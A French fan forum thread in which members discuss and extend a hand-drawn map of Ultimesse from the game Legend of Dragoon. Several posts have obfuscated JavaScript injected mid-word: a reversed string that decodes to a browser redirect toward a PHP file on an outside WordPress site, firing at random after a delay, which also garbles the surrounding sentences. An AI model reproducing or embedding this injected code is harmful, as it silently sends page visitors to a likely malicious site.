Carte d'Ultimesse

Pour présenter vos fanarts de LoD
Avatar du membre
Lloyd
Dragon d'Argent
Dragon d'Argent
Messages : 100
Enregistré le : 08 mars 2009, 03:59
Localisation : Normandie
Contact :

Carte d'Ultimesse

Message par Lloyd »

Voila ma carte ^^

Carte d'Ultimesse

Elle a subi plusieurs modifications par rapport a la version sur l'ancien forum pour ceux qui s'en souviennent.
Image
Avatar du membre
giuliani
Dragon de Jade
Dragon de Jade
Messages : 71
Enregistré le : 03 mai 2011, 23:13
Localisation : Toulouse
Contact :

Re: Carte d'Ultimesse

Message par giuliani »

Excellente,
en plus ça m'aidera pour mon projet, les cartes dispos sur internet sont assez floues...
Au moins celle-là est super propre et stylée

Par contre, si je peux me permettre il manque Rouge, et Aglis, Ulara

Autre petite suggestion où et comment situerais-tu la rencontre avec le bâteau fantôme, la forêt des voliens et du coup les terres interdites, Zenebatos et Mayfil ?
Ne nous prenons pas trop au sérieux, il n'y aura aucun survivant.
Image
Avatar du membre
Lloyd
Dragon d'Argent
Dragon d'Argent
Messages : 100
Enregistré le : 08 mars 2009, 03:59
Localisation : Normandie
Contact :

Re: Carte d'Ultimesse

Message par Lloyd »

Je ne suis pas contre de l'aide pour compléter ma carte si il manque des choses. Je me suis basé sur la carte officiel en anglais en essayant de retraduire les noms comme dans le jeux VF (je n'ai d'ailleurs pas réussi a traduire certains noms du continent à droite)

Pour Rouge, Aglis et Ulara je ne sais plus ou elles se situent >_<

Et pour les autres lieux que tu propose ben... aucune idée XD
Image
Avatar du membre
giuliani
Dragon de Jade
Dragon de Jade
Messages : 71
Enregistré le : 03 mai 2011, 23:13
Localisation : Toulouse
Contact :

Re: Carte d'Ultimesse

Message par giuliani »

Ah merde, pareil de mon côté ^^

Pour Rouge (et Aglis qui surgit des hauts en face de Rouge), en relisant des soluces, il semblerait que ça se situe dans les iles brisées à gauche, mais de mémoire on y accédait depuis Fletz, du coup je trouve que sur la carte c'est qu$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and même super éloigné et donc pas très cohérent...

Je suis en train de me refaire le jeu mais comme je ne suis qu'au début, je reste dans la prison d'héléna pour étudier l'intérieur et la recréer en 3D. je suis pris d'une petite crise de folie Dragoon en ce moment, et je vais essayer de commencer un petit MMORPG amateur :D

Pour le continent de droite, pas la peine de les traduire je pense, on les voit pas en jeu, moi je lis de haut en bas:
Azeel
Posta
Ezirgse?
Slalio
Seilnder?
Et Nissel
Ne nous prenons pas trop au sérieux, il n'y aura aucun survivant.
Image
Avatar du membre
giuliani
Dragon de Jade
Dragon de Jade
Messages : 71
Enregistré le : 03 mai 2011, 23:13
Localisation : Toulouse
Contact :

Re: Carte d'Ultimesse

Message par giuliani »

Salut Lloyd,

Pour reconstituer la mappemonde de Dragoon en 3D, je suis en train de me taper toutes les vidéos du jeu.
Si ça te dit, je pourrais à l'aide de la map que tu viens de refaire, par exemple rajouter tout un tas d'annotations et de lieu pour la rendre la plus complète possible.
Après je ne veux pas saborder ton travail (j'insiste là-dessus, le probléme des PM et autres messages sur les forums, c'est l'aspect impersonnel des propos, donc je ne veux pas causer de problème ni qu'il y ait de malentendu entre nous ^^), mais je pourrais te renvoyer un brouillon de ta map modifiée et éventuellement et si tu le souhaites tu pourrais la remodifier avec ton style?

Tiens moi au courant

A bientôt
Ne nous prenons pas trop au sérieux, il n'y aura aucun survivant.
Image
Avatar du membre
Lloyd
Dragon d'Argent
Dragon d'Argent
Messages : 100
Enregistré le : 08 mars 2009, 03:59
Localisation : Normandie
Contact :

Re: Carte d'Ultimesse

Message par Lloyd »

Ha mais bien sur, toute aide est la bienvenue ^^

Ces informations pourront d'ailleurs être très utile lors de la rédaction de "l'Atlas d'Ultimesse" pour le site avec des description des lieux, images, emplacement sur la carte etc, je réfléchi pour faire un truc clair et joli.
Image
Avatar du membre
yami627
Dragon d'Argent
Dragon d'Argent
Messages : 173
Enregistré le : 10 avr. 2011, 19:56

Re: Carte d'Ultimesse

Message par yami627 »

giuliani a écrit :Autre petite suggestion où et comment situerais-tu la rencontre avec le bâteau fantôme, la forêt des voliens et du coup les terres interdites, Zenebatos et Mayfil ?
pourquoi pas mettre ses lieu d'une autre couleurs ou entre parenthèse... histoire de bien les diffenrencier car elles ne sont pas la des le début (enfin je me comprend XD désolée si je ne suis pas assez clair XD)

giuliani a écrit :Pour reconstituer la mappemonde de Dragoon en 3D, je suis en train de me taper toutes les vidéos du jeu.
Les plans que j'ai fait pour la soluce pourrait peut être t'aider ? dis moi si tu veux que je te les envoie. (elles sont plus gr$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes que sur le forum en réalité)
Image
Avatar du membre
giuliani
Dragon de Jade
Dragon de Jade
Messages : 71
Enregistré le : 03 mai 2011, 23:13
Localisation : Toulouse
Contact :

Re: Carte d'Ultimesse

Message par giuliani »

Nickel Lloyd, j'ai bientôt terminer je t'enverrai ça dès que possible, ou je poste le lien vers le brouillon dans ce topic sinon.
yami627 a écrit : Les plans que j'ai fait pour la soluce pourrait peut être t'aider ? dis moi si tu veux que je te les envoie. (elles sont plus gr$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes que sur le forum en réalité)
Mais tes plans m'aident déjà beaucoup^^
Si tu les as en plus gr$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and ça m'intéresse, aussi j'ai vu que derrière un de tes plans tu as mis le croquis de Fruegel (pour la prison) si tu as le croquis, ça m'intéresse aussi, parce que je n'arrive pas à le trouver.
merci d'avance ^^
Ne nous prenons pas trop au sérieux, il n'y aura aucun survivant.
Image
Avatar du membre
giuliani
Dragon de Jade
Dragon de Jade
Messages : 71
Enregistré le : 03 mai 2011, 23:13
Localisation : Toulouse
Contact :

Re: Carte d'Ultimesse

Message par giuliani »

Voila, j'ai bouclé la carte cette nuit, c'est brouillon hein^^

http://phamter.free.fr/images/Carte_LoD2.png

Tu verras j'ai déplacé certains des lieux de ta carte, je les ai juste décalés, pour les cités dans les airs, les positions sont plus approximatives, même chose pour l'arbre divin.
Les traits de couleurs représentent les trajets pour chacun des chapitres, depuis le rond (point de départ du CD) les pointillés représentent les passages à débloquer le plus souvent, ou cachés, ou à dos de Coolon dans les airs etc...
J’espère que ce sera lisible et compréhensible ^^
Ne nous prenons pas trop au sérieux, il n'y aura aucun survivant.
Image
Avatar du membre
Septine Madrona
Dragon Noir
Dragon Noir
Messages : 256
Enregistré le : 23 nov. 2008, 19:34
Localisation : Libourne (33)
Contact :

Re: Carte d'Ultimesse

Message par Septine Madrona »

Beau boulot! Il m'a fallu un peu de temps pour comprendre les trajets, heureusement qu'il y a la légende.
Image
Répondre